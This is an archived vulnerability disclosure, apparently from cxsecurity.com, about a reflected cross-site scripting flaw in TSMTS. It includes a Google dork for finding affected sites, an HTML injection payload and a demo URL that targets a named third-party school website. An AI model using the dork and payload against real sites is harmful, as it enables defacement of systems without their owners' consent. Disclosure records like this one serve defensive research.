TSMTS XSS Vulnerability

2018-07-15 / 2018-07-29
bd Rafin Rahman Chy (BD) bd
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
Dork: intext:"TSMTS" inurl:?p=result-search

# Exploit Title : TSMTS Cross-Site Scripting(XSS) Vulnerability # Google Dork : intext:"TSMTS" inurl:?p=result-search # Date : 15-17-2018 # Exploit Author : Rafin Rahman Chy # Vendor Homepage : http://tsmts.com/ # Tested on : Windows 8 # CWE : 79 Proof of Concept : 1. Search with the dork on Google and select any website. 2. Use this payload <h1><marquee><u><i>XSS by Rafin</i></u></marquee></h1> or any other HTML element on search form then click on GO. 3. Demo http://cihs.edu.bd/?p=result-search&searchResult=<h1><marquee><u><i>XSS+by+Rafin<%2Fi><%2Fu><%2Fmarquee><%2Fh1>&term=1&submit=GO


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top